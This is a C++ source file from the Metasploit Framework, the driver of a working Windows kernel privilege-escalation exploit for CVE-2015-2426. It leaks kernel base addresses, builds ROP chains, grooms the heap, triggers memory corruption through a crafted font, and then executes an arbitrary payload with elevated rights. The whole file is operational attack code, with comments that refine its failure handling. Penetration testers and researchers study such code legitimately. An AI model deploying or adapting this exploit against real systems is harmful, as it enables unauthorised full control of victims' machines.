GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2015-2426/dll/src/Exploit.cpp
// Exploit.cpp : Implements Exploit(), the entry point of the CVE-2015-2426 exploit chain in this DLL.
//
#include <Windows.h>
#include "Exploit.h"
#include "Win32kLeaker.h"
#include "Exploiter.h"
#include "FontData.h"
/*
 * ExecutePayload - transfer control to the payload blob.
 *
 * lpPayload: start of the payload. It is assumed to already be mapped
 *            executable; this function changes no page protections and does
 *            no validation (a NULL or bad pointer simply faults here).
 */
static VOID ExecutePayload(LPVOID lpPayload)
{
    typedef VOID(*PAYLOAD_ENTRY)();
    PAYLOAD_ENTRY entry = (PAYLOAD_ENTRY)lpPayload;
    entry();
}
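/*
 * Exploit - run the CVE-2015-2426 kernel exploit chain, then jump to the
 * supplied payload.
 *
 * lpPayload: payload handed to ExecutePayload() after the second ROP chain
 *            has run. Note that it is executed unconditionally at the end of
 *            the chain: nothing here verifies that privileges were actually
 *            elevated, so a silently failed second stage still runs the
 *            payload in the original security context.
 *
 * Returns early, without running the payload, if the win32k base cannot be
 * leaked or if the first chain does not yield an ntoskrnl base.
 */
VOID Exploit(LPVOID lpPayload)
{
    DWORD cFonts = 0;
    PVOID pFontData = (PVOID)fontData;
    ULONGLONG win32kBaseAddr;
    ULONGLONG ntBaseAddr;

    ExploiterInit();

    /* Stage 0: leak the win32k.sys base the first ROP chain is built against. */
    win32kBaseAddr = LeakWin32kAddress();
    if (win32kBaseAddr == 0) {
        /* NOTE(review): mirrors the original early exit; ExpoiterCleanUp() is
         * not called on this path -- confirm whether ExploiterInit() leaves
         * state that should be undone. */
        return;
    }

    ExploiterSetupFirstChain(win32kBaseAddr);
    ExploiterDoFengShui();

    /* Trigger the memory corruption: the crafted font is parsed while the
     * memory resource is added. The returned handle is deliberately not
     * checked -- a malformed font may well be rejected (fh == NULL) even
     * though the overwrite has already happened, so a NULL handle must not be
     * treated as failure. RemoveFontMemResourceEx() is expected to just fail
     * on a NULL handle. */
    HANDLE fh = AddFontMemResourceEx(pFontData, sizeof(fontData), 0, &cFonts);
    RemoveFontMemResourceEx(fh);

    /* Stage 1: run the first chain to leak the ntoskrnl base. */
    ExploiterRunFirstChain();
    ntBaseAddr = ExploiterGetNtBase();
    if (ntBaseAddr == 0) {
        /* Without a kernel base the second chain would be built on garbage
         * and running it would most likely crash the target, so bail out
         * instead of continuing. Assumes ExploiterGetNtBase() reports failure
         * as 0 -- TODO confirm against Exploiter.cpp. */
        return;
    }

    /* Stage 2: elevate privileges. */
    ExploiterSetupSecondChain(win32kBaseAddr, ntBaseAddr);
    ExploiterRunSecondChain();
    ExpoiterCleanUp(); /* sic: external symbol name from Exploiter.h, keep as spelled */

    /* Execute the msf payload. */
    ExecutePayload(lpPayload);
}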